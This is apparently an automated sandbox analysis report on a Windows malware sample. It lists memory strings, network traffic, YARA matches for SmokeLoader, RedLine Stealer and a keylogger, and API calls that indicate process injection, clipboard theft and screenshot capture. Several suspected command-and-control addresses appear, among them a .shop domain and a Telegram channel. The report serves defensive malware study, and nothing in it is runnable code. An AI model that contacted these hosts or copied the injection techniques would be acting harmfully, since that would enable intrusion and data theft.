Source: F441.exe, 00000006.00000003.2060569884.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: JKEGDH.9.dr	String found in binary or memory: https://support.mozilla.org
Source: JKEGDH.9.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: JKEGDH.9.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: F441.exe, 00000006.00000003.2060569884.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2536615171.0000000000951000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2522727838.000000000093B000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp, BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: F441.exe, 00000006.00000003.2060569884.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2536615171.0000000000951000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2522727838.000000000093B000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp, BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: BFCFBF.9.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: kat796E.tmp, 00000009.00000002.2823531512.000000000060B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: 9EDA.exe, 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, 9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwin
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: F441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop//E
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/B9E
Source: F441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/aFX
Source: F441.exe, 00000006.00000002.2557803498.000000000055A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: F441.exe, 00000006.00000002.2557803498.00000000005B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://whispedwoodmoodsksl.shop/l
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1697094973.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: nss3.dll.9.dr, freebl3.dll.9.dr, nss3[1].dll.9.dr, mozglue[1].dll.9.dr, mozglue.dll.9.dr, softokn3[1].dll.9.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: kat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: F441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/:
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: kat796E.tmp, kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/IDGDGCGHCG
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2699353969.000000001BDA3000.00000004.00000020.00020000.00000000.sdmp, JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: kat796E.tmp, 00000009.00000002.2823531512.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: F441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2699353969.000000001BDA3000.00000004.00000020.00020000.00000000.sdmp, JKEGDH.9.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 52653 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52679
Source: unknown	Network traffic detected: HTTP traffic on port 52682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52674
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52671
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52675
Source: unknown	Network traffic detected: HTTP traffic on port 52662 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52680
Source: unknown	Network traffic detected: HTTP traffic on port 52685 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52681
Source: unknown	Network traffic detected: HTTP traffic on port 52692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52687
Source: unknown	Network traffic detected: HTTP traffic on port 52661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52692
Source: unknown	Network traffic detected: HTTP traffic on port 52665 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52659 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52690
Source: unknown	Network traffic detected: HTTP traffic on port 52669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52659
Source: unknown	Network traffic detected: HTTP traffic on port 52680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52653
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52664 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52668 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52668
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52669
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 52677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52662
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52663
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52661
Source: unknown	Network traffic detected: HTTP traffic on port 52660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52664
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52665
Source: unknown	Network traffic detected: HTTP traffic on port 52688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52663 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52684 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52653 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52659 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:52660 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:52661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:52662 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

6_2_0042EAB0

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Temp\F441.exe

Code function: 6_2_0042EAB0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

6_2_0042EAB0

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\F441.exe

6_2_0042EC90

Yara detected Keylogger Generic

Source: Yara match	File source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9EDA.exe PID: 2124, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.9EDA.exe.44d0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4490000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4267719.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4490000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.4267719.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 8.2.9EDA.exe.44d0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing potential Windows Defender anti-emulation checks Author: ditekSHen
Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401615
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401658
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401620
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401524
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040162D
Source: C:\Users\user\Desktop\4.exe	Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401635
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401615
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401658
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401620
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401524
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_0040162D
Source: C:\Users\user\AppData\Roaming\sdveeeu	Code function: 5_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401635
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_04299B10 NtProtectVirtualMemory,NtProtectVirtualMemory,	8_2_04299B10
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_0429A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	8_2_0429A4F0
Source: C:\Users\user\AppData\Local\Temp\9EDA.exe	Code function: 8_2_04299850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	8_2_04299850
Source: C:\Users\user\AppData\Local\Temp\kat796E.tmp	Code function: 9_2_6D0C62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	9_2_6D0C62C0

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00427353	6_2_00427353
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004016E0	6_2_004016E0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00420880	6_2_00420880
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00404970	6_2_00404970
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0041FD10	6_2_0041FD10
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0043B050	6_2_0043B050
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00426174	6_2_00426174
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004061F0	6_2_004061F0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00426284	6_2_00426284
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004223B8	6_2_004223B8
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00405440	6_2_00405440
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_0040F400	6_2_0040F400
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004164D2	6_2_004164D2
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00433480	6_2_00433480
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00403570	6_2_00403570
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00421580	6_2_00421580
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004067B0	6_2_004067B0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_004089A0	6_2_004089A0
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00424B80	6_2_00424B80
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00421C71	6_2_00421C71
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00425CEE	6_2_00425CEE
Source: C:\Users\user\AppData\Local\Temp\F441.exe	Code function: 6_2_00440D36	6_2_00440D36
